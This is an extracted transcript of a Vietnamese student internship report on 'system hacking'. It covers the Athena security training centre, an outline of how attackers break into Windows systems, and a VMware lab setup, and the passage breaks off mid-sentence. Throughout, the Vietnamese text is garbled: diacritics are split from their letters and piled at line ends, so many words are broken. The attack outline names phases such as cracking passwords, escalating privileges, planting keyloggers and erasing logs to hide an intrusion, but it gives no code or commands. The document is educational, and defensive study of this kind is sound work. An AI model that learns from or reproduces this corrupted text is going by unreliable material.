system hacking
TRANSCRIPT
TR NG Đ I H C KHOA H C T NHIÊNƯỜ Ạ Ọ Ọ Ự
KHOA ĐI N T VI N THÔNGỆ Ử Ễ
- - - - - -
TRUNG TÂM ĐÀO T O QU N TR M NGẠ Ả Ị Ạ
VÀ AN NINH M NG QU C T ATHENAẠ Ố Ế
BÁO CÁO TH C T PỰ Ậ
SYSTEM HACKINGGi ng viên h ng d n: Võ Đ Th ngả ướ ẫ ỗ ắ
Sinh viên th c hi n : Huỳnh Minh Tríự ệ
Thành ph H Chí Minhố ồ
System Hacking
M Đ UỞ Ầ
Phát tán virus đã th c s tr thành m t ngành "công nghi p" trong ho tự ự ở ộ ệ ạ
đ ng gián đi p năm 2013, nh d đoán t đ u năm c a Công ty An ninh m ngộ ệ ư ự ừ ầ ủ ạ
Bkav. Ho t đ ng gián đi p này không ch t n t i nh ng n c phát tri n nhạ ộ ệ ỉ ồ ạ ở ữ ướ ể ư
Mỹ, Đ c, Pháp… mà còn hi n h u ngay t i Vi t Nam. Trong năm qua, theo ghiứ ệ ữ ạ ệ
nh n c a Bkav, ph n m m gián đi p đã xu t hi n t i h u h t các c quan quanậ ủ ầ ề ệ ấ ệ ạ ầ ế ơ
tr ng t các c quan Chính ph , Qu c h i t i B Qu c phòng, B Công an hayọ ừ ơ ủ ố ộ ớ ộ ố ộ
các ngân hàng, vi n nghiên c u, tr ng đ i h c… Các ph n m m gián đi p nàyệ ứ ườ ạ ọ ầ ề ệ
l i d ng l h ng an ninh trong file văn b n (Word, Excel, PowerPoint) đ phátợ ụ ỗ ổ ả ể
tán.
Cu i năm 2013, vi c l i d ng các file văn b n đ cài ph n m m gián đi pố ệ ợ ụ ả ể ầ ề ệ
đã ti n thêm m t b c, không c n thông qua l h ng mà chuy n sang s d ngế ộ ướ ầ ỗ ổ ể ử ụ
hình th c phishing. Trung tu n tháng 12, Bkav phát hi n m t lo t các v tin t cứ ầ ệ ộ ạ ụ ặ
chèn mã đ c vào file văn b n không s d ng l h ng. Mã đ c n d i hình th cộ ả ử ụ ỗ ổ ộ ẩ ướ ứ
1 nh thu nh đ c nhúng tr c ti p vào file văn b n. Đ đ c n i dung, ch cả ỏ ượ ự ế ả ể ọ ộ ắ
ch n ng i dùng sẽ click đ m nh l n h n, nh v y sẽ kích ho t mã đ c. Ôngắ ườ ể ở ả ớ ơ ư ậ ạ ộ
Ngô Tu n Anh, Phó ch t ch ph trách An ninh m ng c a Bkav, cho bi t: “V iấ ủ ị ụ ạ ủ ế ớ
hình th c này, b t kỳ máy tính nào cũng sẽ b cài ph n m m gián đi p màứ ấ ị ầ ề ệ
không c n l h ng. Phishing đ cài đ t ph n m m gián đi p sẽ đ c s d ngầ ỗ ổ ể ặ ầ ề ệ ượ ử ụ
r ng rãi và sẽ là xu h ng trong năm 2014”.ộ ướ
Bài báo cáo này sẽ gi i thi u t ng quát c b n v các ph ng pháp màớ ệ ổ ơ ả ề ươ
Hacker s d ng đ t n công xâm nh p và khai thác vào các phiên b n h đi uử ụ ể ấ ậ ả ệ ề
hành Windows, h đi u hành ph bi n nh t hi n nay t i Vi t Nam, t đó giúpệ ề ổ ế ấ ệ ạ ệ ừ
chúng ta n m rõ cách th c mà Hacker s d ng và đ a ra các gi i pháp giúp choắ ứ ử ụ ư ả
ng i dùng đ c an toàn thông tin, b o m t trong th i đ i Internet ngày nay.ườ ượ ả ậ ờ ạ
Huỳnh Minh Trí Page 1
System Hacking
L I C M N KHOA ĐI N T VI N THÔNGỜ Ả Ơ Ệ Ử Ễ
TR NG Đ I H C KHOA H C T NHIÊN TPHCMƯỜ Ạ Ọ Ọ Ự
Em xin chân thành c m n tr ng Đ i H c Khoa H c T Nhiên TPHCM vàả ơ ườ ạ ọ ọ ự
khoa Đi n T Vi n Thông đã t o đi u ki n cho em hoàn thành t t đ t Th cệ ử ễ ạ ề ệ ố ợ ự
T p này. Đ t th c t p này đã cho em nh ng kinh nghi m quý báu. Nh ng kinhậ ợ ự ậ ữ ệ ữ
nghi m này sẽ giúp em hoàn thi n h n trong công vi c và môi tr ng làm vi cệ ệ ơ ệ ườ ệ
sau này.
M c dù em đã c g ng hoàn thành báo cáo th c t p này v i t t c n l cặ ố ắ ự ậ ớ ấ ả ỗ ự
c a b n thân. Nh ng do trình đ hi u bi t và kinh nghi m th c t có h n nênủ ả ư ộ ể ế ệ ự ế ạ
ch c ch n không th tránh kh i nh ng thi u sót nh t đ nh. R t mong nh nắ ắ ể ỏ ữ ế ấ ị ấ ậ
đ c s đóng góp, chia s đ em có th làm t t h n n a. M t l n n a em xinượ ự ẻ ể ể ố ơ ữ ộ ầ ữ
chân thành c m n.ả ơ
TPHCM, ngày 23 tháng 10 năm 2014
Sinh viên th c t pự ậ
Huỳnh Minh Trí
Huỳnh Minh Trí Page 2
System Hacking
L I C M N TRUNG TÂM ATHENAỜ Ả Ơ
Em xin c m n giám đ c Công Ty Qu n Tr và An Ninh M ng Qu c Tả ơ ố ả ị ạ ố ế
Athena, cùng các anh ch trong công ty. Đ c bi t, em xin chân thành c m n th yị ặ ệ ả ơ ầ
Đ Võ Th ng và th y Lê Đình Nhân đã nhi t tình giúp đ và h ng d n emỗ ắ ầ ệ ỡ ướ ẫ
trong th i gian th c t p t i công ty. Th y đã t o m i đi u ki n thu n l i, cungờ ự ậ ạ ầ ạ ọ ề ệ ậ ợ
c p nhũng ki n th c c n thi t cũng nh đóng góp nh ng ý ki n quý báu đấ ế ứ ầ ế ư ữ ế ể
hoàn thành t t bài báo cáo này.ố
Em cũng xin g i l i cám n đ n các anh ch , b n bè đã truy n đ t kinhử ờ ơ ế ị ạ ề ạ
nghi m và t o đi u ki n cho em hoàn thành đ tài này.ệ ạ ề ệ ề
Trong quá trình th c hi n đ tài không th không có nh ng sai sót, mongự ệ ề ể ữ
th y cô t i trung tâm ATHENA và các b n th ng th n góp ý đ em rút kinhầ ạ ạ ẳ ắ ề
nghi m trong các công trình tìm hi u, phát tri n sau này.ệ ể ể
M t l n n a tôi xin chân thành c m n.ộ ầ ữ ả ơ
TPHCM, ngày 23 tháng 10 năm 2014
Sinh viên th c t pự ậ
Huỳnh Minh Trí
Huỳnh Minh Trí Page 3
System Hacking
GI I THI U CHUNG V CÔNG TY TH C T PỚ Ệ Ề Ự Ậ
Trung Tâm Đào T o Qu n Tr M ng & An Ninh M ng Qu c T ATHENAạ ả ị ạ ạ ố ế
đ c thành l p t năm 2004, là m t t ch c qui t nhi u trí th c tr Vi t Namượ ậ ừ ộ ổ ứ ụ ề ứ ẻ ệ
đ y năng đ ng, nhi t huy t và kinh nghi m trong lãnh v c CNTT, v i tâm huy tầ ộ ệ ế ệ ự ớ ế
góp ph n vào công cu c thúc đ y ti n trình đ a công ngh thông tin là ngànhầ ộ ẩ ế ư ệ
kinh t mũi nh n, góp ph n phát tri n n c nhà.ế ọ ầ ể ướ
Lĩnh v c ho t đ ng chính:ự ạ ộ
– Trung tâm ATHENA đã và đang t p trung ch y u vào đào t o chuyênậ ủ ế ạ
sâu qu n tr m ng, an ninh m ng, th ng m i đi n t theo các tiêu chu n qu cả ị ạ ạ ươ ạ ệ ử ẩ ố
t c a các hãng n i ti ng nh Microsoft, Cisco, Oracle, Linux LPI , CEH,... Songế ủ ổ ế ư
song đó, trung tâm ATHENA còn có nh ng ch ng trình đào t o cao c p dànhữ ươ ạ ấ
riêng theo đ n đ t hàng c a các đ n v nh B Qu c Phòng, B Công An , ngânơ ặ ủ ơ ị ư ộ ố ộ
hàng, doanh nghi p, các c quan chính ph , t ch c tài chính…ệ ơ ủ ổ ứ
– Sau g n 10 năm ho t đ ng,nhi u h c viên t t nghi p trung tâmầ ạ ộ ề ọ ố ệ
ATHENA đã là chuyên gia đ m nh n công tác qu n lý h th ng m ng, an ninhả ậ ả ệ ố ạ
m ng cho nhi u b ngành nh C c Công Ngh Thông Tin - B Qu c Phòng , Bạ ề ộ ư ụ ệ ộ ố ộ
Công An, S Thông Tin Truy n Thông các t nh, b u đi n các t nh,…ở ề ỉ ư ệ ỉ
– Ngoài ch ng trình đào t o, Trung tâm ATHENA còn có nhi u ch ngươ ạ ề ươ
trình h p tác và trao đ i công ngh v i nhi u đ i h c l n nh đ i h c Báchợ ổ ệ ớ ề ạ ọ ớ ư ạ ọ
Khoa Thành Ph H Chí Minh, H c Vi n An Ninh Nhân Dân (Th Đ c), H cố ồ ọ ệ ủ ứ ọ
Vi n B u Chính Vi n Thông, Hi p h i an toàn thông tin (VNISA), Vi n Kỹ Thu tệ ư ễ ệ ộ ệ ậ
Quân S ... ự
Đ i ngũ gi ng viên : ộ ả
– T t c các gi ng viên trung tâm ATHENA có đ u t t nghi p t cácấ ả ả ề ố ệ ừ
tr ng đ i h c hàng đ u trong n c.... T t c gi ng viên ATHENA đ u ph i cóườ ạ ọ ầ ướ ấ ả ả ề ả
các ch ng ch qu c t nh MCSA, MCSE, CCNA, CCNP, Security+, CEH, có b ngứ ỉ ố ế ư ằ
Huỳnh Minh Trí Page 4
System Hacking
s ph m Qu c t (Microsoft Certified Trainer). Đây là các ch ng ch chuyênư ạ ố ế ứ ỉ
môn b t bu c đ đ đi u ki n tham gia gi ng d y t i trung tâm ATHENA ắ ộ ể ủ ề ệ ả ạ ạ
– Bên c nh đó, các gi ng viên ATHENA th ng đi tu nghi p và c p nh tạ ả ườ ệ ậ ậ
ki n th c công ngh m i t các n c tiên ti n nh Mỹ , Pháp, Hà Lan,ế ứ ệ ớ ừ ướ ế ư
Singapore... và truy n đ t các công ngh m i này trong các ch ng trình đàoề ạ ệ ớ ươ
t o t i trung tâm ATHENAạ ạ
Liên h :ệ
– C s 1:ơ ở
92 Nguy n Đình Chi u, ph ng Đa Kao, Q1, TPHCMễ ể ườ
Đi n tho i: 0907879477ệ ạ
0943230099
(08)38244041
G n ngã t Đinh Tiên Hoàng - Nguy n Đình Chi uầ ư ễ ể
– C s 2: 2 Bis Đinh Tiên Hoàng, ph ng Đa Kao, Q1, TPHCMơ ở ườ
Đi n tho i: 0943200088 ệ ạ
(08)22103801
C nh sân v n đ ng Hoa L - Cách đài truy n hình Tp HTV 50 mét ạ ậ ộ ư ề
– Website: http://athena.edu.vn
http://athena.com.vn
– E-mail : [email protected] [email protected]
Huỳnh Minh Trí Page 5
System Hacking
NH N XÉT C A KHOAẬ Ủ
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Huỳnh Minh Trí Page 6
System Hacking
NH N XÉT C A TRUNG TÂMẬ Ủ
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Giám đ cố
Huỳnh Minh Trí Page 7
System Hacking
NH N XÉT C A GI NG VIÊN H NG D NẬ Ủ Ả ƯỚ Ẫ
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Gi ng viên h ng d nả ướ ẫ
Huỳnh Minh Trí Page 8
System Hacking
Huỳnh Minh Trí Page 9
System Hacking
Huỳnh Minh Trí Page 10
System Hacking
PH N 1: GI I THI UẦ Ớ Ệ
1. System Hacking là gì ?
System hacking bao g m nh ng kỹ thu t l y username, password d a vàoồ ữ ậ ấ ự
ph n m m cài trên h th ng ho c tính d cài đ t và ch y các d ch v t xa c aầ ề ệ ố ặ ễ ặ ạ ị ụ ừ ủ
h đi u hành Windows. Nâng quy n trong h th ng, s d ng keyloger đ l yệ ề ề ệ ố ử ụ ể ấ
thông tin, xóa nh ng log file h th ng. M t khi đã xâm nh p vào h th ng,ữ ệ ố ộ ậ ệ ố
Hacker có th th c hi n m i th trên máy tính đó, gây ra nh ng h u qu vôể ự ệ ọ ứ ữ ậ ả
cùng nghiêm tr ng cho các cá nhân, t ch c.ọ ổ ứ
2. Các l h ng th ng khai thác trong h đi u hành Windowsỗ ổ ườ ệ ề
Ph n m m máy tính ngày nay vô cùng ph c t p, bao g m hàng ngàn dòngầ ề ứ ạ ồ
mã. Ph n m m đ c vi t ra b i con ng i, nên cũng ch ng có gì l khi trong đóầ ề ượ ế ở ườ ẳ ạ
có ch a nh ng l i l p trình, đ c bi t đ n v i tên g i l h ng. Nh ng l h ngứ ữ ỗ ậ ượ ế ế ớ ọ ỗ ổ ữ ỗ ổ
này đ c Hacker s d ng đ xâm nh p vào h th ng, cũng nh đ c tác giượ ử ụ ể ậ ệ ố ư ượ ả
c a các đ an mã đ c dùng đ kh i đ ng ch ng trình c a h m t cách t đ ngủ ọ ộ ể ở ộ ươ ủ ọ ộ ự ộ
trên máy tính c a b n.ủ ạ
Hi n nay các l h ng b o m t đ c phát hi n càng nhi u trong các hệ ỗ ổ ả ậ ượ ệ ề ệ
đi u hành, các Web Server hay các ph n m m khác, ... Và các hãng s n xu t luônề ầ ề ả ấ
c p nh t các l h ng và đ a ra các phiên b n m i sau khi đã vá l i các l h ngậ ậ ỗ ổ ư ả ớ ạ ỗ ổ
c a các phiên b n tr c. Do đó, ng i s d ng ph i luôn c p nh t thông tin vàủ ả ướ ườ ử ụ ả ậ ậ
nâng c p phiên b n cũ mà mình đang s d ng n u không các Hacker sẽ l iấ ả ử ụ ế ợ
d ng đi u này đ t n công vào h th ng. Thông th ng, các forum c a các hãngụ ề ể ấ ệ ố ườ ủ
n i ti ng luôn c p nh t các l h ng b o m t và vi c khai thác các l h ng đóổ ế ậ ậ ỗ ổ ả ậ ệ ỗ ổ
nh th nào thì tùy t ng ng i.ư ế ừ ườ
Microsoft luôn có nh ng c i ti n an ninh v t tr i qua m i phiên b n m iữ ả ế ượ ộ ỗ ả ớ
Huỳnh Minh Trí Page 11
System Hacking
c a h đi u hành Windows. Tuy nhiên, m t s th t là các m i đe d a m ng v nủ ệ ề ộ ự ậ ố ọ ạ ẫ
đang ngày càng phát tri n nhanh h n so v i chu trình c p nh t và đ i m i hể ơ ớ ậ ậ ổ ớ ệ
đi u hành c a Microsoft.ề ủ
Tr c tiên ta sẽ tìm hi u t ng quát m t quá trình t n công h th ng. M cướ ể ổ ộ ấ ệ ố ụ
tiêu phía tr c c a chúng ta là m t h th ng máy tính. Các b c đ t n công,ướ ủ ộ ệ ố ướ ể ấ
đánh s p nó, có th đ c li t kê nh hình vẽ bên c nh. Nó g m 6 công đo nậ ể ượ ệ ư ạ ồ ạ
nh sau:ư
Quá trình t n công vào m t h th ngấ ộ ệ ố
– Enumerate (li t kê): Trích ra t t c nh ng thông tin có th v userệ ấ ả ữ ể ề
trong h th ng. S d ng ph ng pháp thăm dò SNMP đ có đ c nh ng thôngệ ố ử ụ ươ ể ượ ữ
tin h u ích, chính xác h n. ữ ơ
Huỳnh Minh Trí Page 12
System Hacking
– Crack: Công đo n này có lẽ h p d n nhi u Hackernh t. B c này yêuạ ấ ẫ ề ấ ướ
c u chúng ta bẽ khóa m t kh u đăng nh p c a user. Ho c b ng m t cách nàoầ ậ ẩ ậ ủ ặ ằ ộ
khác, m c tiêu ph i đ t t i là quy n truy c p vào h th ng. ụ ả ạ ớ ề ậ ệ ố
– Escalste (leo thang): Nói cho d hi u là chuy n đ i gi i h n truy c pễ ể ể ổ ớ ạ ậ
t user binh th ng lên admin ho c user có quy n cao h n đ cho chúng ta t nừ ườ ặ ề ơ ủ ấ
công.
– Execute (th c thi): Th c thi ng d ng trên h th ng máy đích. Chu nự ự ứ ụ ệ ố ẩ
b tr c malware, keylogger, rootkit…đ ch y nó trên máy tính t n công. ị ướ ể ạ ấ
– Hide ( n file): Nh ng file th c thi, file soucecode ch y ch ng trình…ẩ ữ ự ạ ươ
C n ph i đ c làm n đi, tránh b m c tiêu phát hi n tiêu di t. ầ ả ượ ẩ ị ụ ệ ệ
– Tracks (d u v t): T t nhiên không ph i là đ l i d u v t. Nh ng thôngấ ế ấ ả ể ạ ấ ế ữ
tin có liên quan đ n b n c n ph i b xóa s ch, không đ l i b t c th gì. N uế ạ ầ ả ị ạ ể ạ ấ ứ ứ ế
không kh năng b n b phát hi n là k đ t nh p là r t cao. ả ạ ị ệ ẻ ộ ậ ấ
Tóm l i, quá trình t n công h th ng (System hacking) là b c ti p theoạ ấ ệ ố ướ ế
sau quá trình kh o sát, thu th p thông tin c a m c tiêu c n t n công b ngả ậ ủ ụ ầ ấ ằ
nh ng kỹ thu t nh Footprinting, Social engineering, Enumeration, Googleữ ậ ư
Hacking… đã đ c áp d ng cho m c đích truy tìm thông tin. ượ ụ ụ
Khi h th ng m c tiêu đã đ c xác đ nh, chúng ta b t đ u đi vào quá trìnhệ ố ụ ượ ị ắ ầ
t n công h th ng th t s . Ta ph i ti n hành nh ng kỹ thu t khác nhau đ làmấ ệ ố ậ ự ả ế ữ ậ ể
sao vào đ c trong h th ng đó, th c hi n nh ng vi c mà mình mong mu n,ượ ệ ố ự ệ ữ ệ ố
nh xóa d li u, ch y ch ng trình trojan, keylogger…ư ữ ệ ạ ươ
Huỳnh Minh Trí Page 13
System Hacking
PH N 2: VMWARE VÀ O HÓA H ĐI U HÀNHẦ Ả Ệ Ề
1. Gi i thi u VMwareớ ệ
VMware Workstation là m t ph n m mộ ầ ề o hóa desktop m nh mẽả ạ dành
cho các nhà phát tri n/ki m tra ph n m m và các chuyên gia IT c n ch yể ể ầ ề ầ ạ
nhi u HĐH m t lúc trên m t máy PC. Ng i dùng có th ch y các HĐHề ộ ộ ườ ể ạ
Windows, Linux, Netware hay Solaris x86 trên các máy o di đ ng mà khôngả ộ
c n ph i kh i đ ng l i hay phân vùng c ng. VMware Workstation cung c pầ ả ở ộ ạ ổ ứ ấ
kh năng ho t đ ng tuy t v i và nhi u tính năng m i nh t i u hóa b nh vàả ạ ộ ệ ờ ề ớ ư ố ư ộ ớ
kh năng qu n lý các thi t l p nhi u l p. Các tính năng thi t y u nh m ng o,ả ả ế ậ ề ớ ế ế ư ạ ả
ch p nh nhanh tr c ti p, kéo th , chia s th m c và h tr PXE khi nụ ả ự ế ả ẻ ư ụ ỗ ợ ế
VMware Workstation tr thành công c m nh mẽ nh t và không th thi u choở ụ ạ ấ ể ế
các nhà doanh nghi p phát tri n tin h c và các nhà qu n tr h th ng.ệ ể ọ ả ị ệ ố
V i hàng tri u khách hàng và hàng lo t các gi i th ng quan tr ng,ớ ệ ạ ả ưở ọ
VMware Workstation đã đ c ch ng minh là m t công gh giúp tăng năng su tượ ứ ộ ệ ấ
và s linh h at trong công vi c. Đây là m t công c không th thi u cho các nhàự ọ ệ ộ ụ ể ế
phát tri n ph n m m và các chuyên gia IT trên toàn th gi i.ể ầ ề ế ớ
VMware Workstation h at đ ng b ng cách cho phép nhi u HĐH và các ngọ ộ ằ ề ứ
d ng c a chúng ch y đ ng th i trên m t máy duy nh t. Các HĐH và ng d ngụ ủ ạ ồ ờ ộ ấ ứ ụ
này đ c tách ra vào trong các máy o. Nh ng máy o này cùng t n t i trênượ ả ữ ả ồ ạ
m t ph n c ng duy nh t. Các layer o c a VMware sẽ k t n i các ph n c ngộ ầ ứ ấ ả ủ ế ố ầ ứ
v t lý v i các máy o, do đó m i máy o sẽ có CPU, b nh , các đĩa, thi t bậ ớ ả ỗ ả ộ ớ ổ ế ị
nh p/xu t riêng.ậ ấ
Các tính năng cho ng i dùng:ườ
– Thi t l p và th nghi m các ng d ng đa l p, c p nh t ng d ng và cácế ậ ử ệ ứ ụ ớ ậ ậ ứ ụ
Huỳnh Minh Trí Page 14
System Hacking
mi ng vá cho HĐH ch trên m t PC duy nh t. ế ỉ ộ ấ
– D dàng ph c h i và chia s các môi tr ng th nghi m đ c l u tr ;ễ ụ ồ ẻ ườ ử ệ ượ ư ữ
gi m thi u các thi t l p trùng l p và th i gian thi t l p. ả ể ế ậ ặ ờ ế ậ
– Làm cho vi c h c t p trên máy tính thu n l i h n do sinh viên luôn đu cệ ọ ậ ậ ợ ơ ợ
s d ng máy v i tình tr ng “s ch sẽ” và th nghi m v i nhi u HĐH, ng d ngử ụ ớ ạ ạ ử ệ ớ ề ứ ụ
cá các công c trên nh ng máy o an tòan và đ c l p.ụ ữ ả ộ ậ
– Ch y các b n demo ph n m m v i các thi t l p ph c t p ho c đa l pạ ả ầ ề ớ ế ậ ứ ạ ặ ớ
trên m t chi c laptop ộ ế
– Tăng t c đ gi i quy t các r c r i c a ng i dùng cu i d a trên m t thố ộ ả ế ắ ố ủ ườ ố ự ộ ư
vi n các máy o đ c thi t l p s n ệ ả ượ ế ậ ẵ
Nh ng tính năng chính:ữ
– H tr nhi u màn hình: B n có th thi t l p đ m t VM tr i r ng raỗ ợ ề ạ ể ế ậ ể ộ ả ộ
nhi u màn hình, ho c nhi u VM, v i m i VM trên m t màn hình riêng bi t. ề ặ ề ớ ỗ ộ ệ
– H tr các thi t b USB 2.0: Bây gi b n đã có th s d ng các thi t bỗ ợ ế ị ờ ạ ể ử ụ ế ị
ng ai vi yêu c u t c đ làm vi c cao trên VM, nh máy MP3 và các thi t b l uọ ầ ố ộ ệ ư ế ị ư
tr di đ ng khác ữ ộ
– VM Record/Replay: B n có th s d ng tính năng này đ thu l i các ho tạ ể ử ụ ể ạ ạ
đ ng c a VM và đ c đ m b o là sẽ tái l p l i tình tr ng c a VM chính xácộ ủ ượ ả ả ậ ạ ạ ủ
100%.
– Integrated Virtual Debugger: Workstation đ c tích h p Visual Studio vàượ ợ
Eclipse nên b n có th tr c ti p s d ng, ch y và vá các l h ng c a cácạ ể ự ế ử ụ ạ ỗ ổ ủ
ch ng trình trong m t VM t m t IDE yêu thích ươ ộ ừ ộ
– Automation APIs (VIX API 2.0): B n có th vi t script hay ch ng trìnhạ ể ế ươ
Huỳnh Minh Trí Page 15
System Hacking
đ VM t đ ng th c hi n vi c ki m tra.ể ự ộ ự ệ ệ ể
Cách t o nên các máy o t VMware:ạ ả ừ
Đ s d ng VMware đ u tiên chúng ta c n t o nên m t máy o, n i màể ử ụ ầ ầ ạ ộ ả ơ
chúng ta sẽ dùng đ cài đ t nên các h đi u hành. Chúng ta có th tuỳ ch nể ặ ệ ề ể ọ
dung l ng c ng, dung l ng RAM, cách k t n i m ng c a máy o… Vi c ti pượ ổ ứ ượ ế ố ạ ủ ả ệ ế
theo c n làm là cài đ t nên m t h đi u hành trên máy o đó. Hi n t i, VMwareầ ặ ộ ệ ề ả ệ ạ
h tr cài đ t r t nhi u d ng h đi u hành. Chúng ta có th cài các phiên b nỗ ợ ặ ấ ề ạ ệ ề ể ả
c a Windows, Linux, Unix… trên các máy o VMware. Vi c cài đ t h đi u hànhủ ả ệ ặ ệ ề
trên máy o hoàn toàn t ng t nh cách cài đ t trên các máy th t.ả ươ ự ư ặ ậ
2. Chia s tài nguyên c a các máy o:ẻ ủ ả
Chia s CPU và RAM: Các máy o sẽ chia s CPU và RAM c a máy tính th t.ẻ ả ẻ ủ ậ
Đ đ m b o h th ng có th ch y t t, yêu c u máy tính th t ph i có c u hìnhể ả ả ệ ố ể ạ ố ầ ậ ả ấ
t ng đ i cao, kho ng 1GB RAM đ có th ch y đ ng th i 4, 5 máy o.ươ ố ả ể ể ạ ồ ờ ả
Chia s c ng: Khi t o ra các máy o, chúng ta sẽ t o ra m t c ng dànhẻ ổ ứ ạ ả ạ ộ ổ ứ
riêng cho máy o n m trên máy th t. c ng o này đ c t o trên vùng đĩaả ằ ậ Ổ ứ ả ượ ạ
tr ng c a đĩa th t, do đó không nh h ng đ n các d li u đang có trên đĩaố ủ ổ ậ ả ưở ế ữ ệ ổ
th t. Chúng ta có th tuỳ ch n dung l ng c a c ng này, có th n đ nh ngayậ ể ọ ượ ủ ổ ứ ể ấ ị
dung l ng ho c cũng có th đ dung l ng c a c ng này là đ ng, sẽ thay đ iượ ặ ể ể ượ ủ ổ ứ ộ ổ
tuỳ theo quá trình s d ng c a chúng ta sau này.ử ụ ủ
Chia s card m ng: Sau khi cài đ t lên, VMware s t o nên 2 card m ngẻ ạ ặ ẻ ạ ạ
VMware 1 và VMware 8 trên máy th t và máy th t có th s d ng 2 card m ngậ ậ ể ử ụ ạ
này đ k t n i v i các máy o. Khi l a ch n c u hình m ng cho các máy o, taể ế ố ớ ả ự ọ ấ ạ ả
có th ch n m t trong các ch đ sau:ể ọ ộ ế ộ
– Bridged networking: Card m ng c a máy o sẽ đ c g n tr c ti p v iạ ủ ả ượ ắ ự ế ớ
Huỳnh Minh Trí Page 16
System Hacking
card m ng c a máy th t (s d ng switch o VMnet0). Lúc này, máy o sẽ đóngạ ủ ậ ử ụ ả ả
vai trò nh m t máy trong m ng th t, có th nh n DHCP t m ng ngoài, ho cư ộ ạ ậ ể ậ ừ ạ ặ
đ t IP tĩnh cùng d i v i m ng ngoài đ giao ti p v i các máy ngoài m ng ho cặ ả ớ ạ ể ế ớ ạ ặ
lên Internet.
C u trúc m ng Bridged Networkingấ ạ
– NAT: Máy o đ c c u hình NAT sẽ s d ng IP c a máy th t đ giaoả ượ ấ ử ụ ủ ậ ể
ti p v i m ng ngoài. Các máy o đ c c p đ a ch IP nh m t DHCP o c aế ớ ạ ả ượ ấ ị ỉ ờ ộ ả ủ
VMware. Lúc này, các máy o sẽ k t n i v i máy th t qua switch o VMnet8, vàả ế ố ớ ậ ả
máy th t sẽ đóng vai trò NAT server cho các máy o.ậ ả
C u trúc m ng NATấ ạ
– Host-only Networking: Khi c u hình máy o s d ng host-onlyấ ả ử ụ
networking, máy o sẽ đ c k t n i v i máy th t trong m t m ng riêng thôngả ượ ế ố ớ ậ ộ ạ
qua Switch o VMnet1. Đ a ch c a máy o và máy th t trong m ng host-only cóả ị ỉ ủ ả ậ ạ
th đ c c p b i DHCP o g n li n v i Switch o Vmnet1 ho c có th đ t đ aể ượ ấ ở ả ắ ề ớ ả ặ ể ặ ị
ch IP tĩnh cùng d i đ k t n i v i nhau.ỉ ả ể ế ố ớ
Huỳnh Minh Trí Page 17
System Hacking
C u trúc m ng Host-Onlyấ ạ
– Ngoài các k t n i trên, ta có th s d ng các switch o trong VMware đế ố ể ử ụ ả ể
k t n i các máy o thành m t h th ng nh mong mu n. Khi cài đ t lên,ế ố ả ộ ệ ố ư ố ặ
VMware t o s n cho chúng ta 10 Switch o t VMnet0 đ n VMnet9. Ngoài cácạ ẵ ả ừ ế
Switch o VMnet0 (dùng cho m ng Bridged Networking), VMnet8 (dùng choả ạ
m ng Nat Networking) và VMnet1 (dùng cho m ng Host-Only Networking),ạ ạ
chúng ta còn 7 Switch o khác đ th c hi n vi c k t n i các máy o. Chúng ta cóả ể ự ệ ệ ế ố ả
th đ t IP đ ng trên các máy n i v i các Switch này đ nh n DHCP o, ho c cóể ặ ộ ố ớ ể ậ ả ặ
th đ t IP tĩnh cùng d i cho các máy này đ m b o chúng k t n i đ c v i nhau.ể ặ ả ả ả ế ố ượ ớ
Chia s đĩa CD-ROM: Các máy o có th s d ng CD-ROM c a máy th t.ẻ ổ ả ể ử ụ ổ ủ ậ
Ngoài ra, ta có th dùng m t file ISO đ đ a vào CD-ROM c a máy o, lúc nàyể ộ ể ư ổ ủ ả
máy o sẽ nh n file ISO gi ng nh m t đĩa CD-ROM trong đĩa c a mình.ả ậ ố ư ộ ổ ủ
3. S d ng Snapshot:ử ụ
Snapshot m t máy o cho phép ta l u l i tr ng thái c a máy o t i th iộ ả ư ạ ạ ủ ả ạ ờ
đi m đó. Snapshot sẽ l u l i thông tin v c ng, Ram và các Setting trên máyể ư ạ ề ổ ứ
o. Sau khi l u snapshot, chúng ta có th quay tr l i tr ng thái c a máy o b tả ư ể ở ạ ạ ủ ả ấ
c lúc nào.ứ
Huỳnh Minh Trí Page 18
System Hacking
VMware cho phép chúng ta l u nhi u snapshot c a máy o, vì th ng iư ề ủ ả ế ườ
dùng có th s d ng m t máy o vào nhi u ng c nh khác nhau, ti t ki m th iể ử ụ ộ ả ề ữ ả ế ệ ờ
gian cho vi c c u hình. Ch ng h n v i m t máy o A, trong m t bài lab ta mu nệ ấ ẳ ạ ớ ộ ả ộ ố
nó là m t máy ch Domain Controller, nh ng trong bài lab khác ta mu n x yộ ủ ư ố ấ
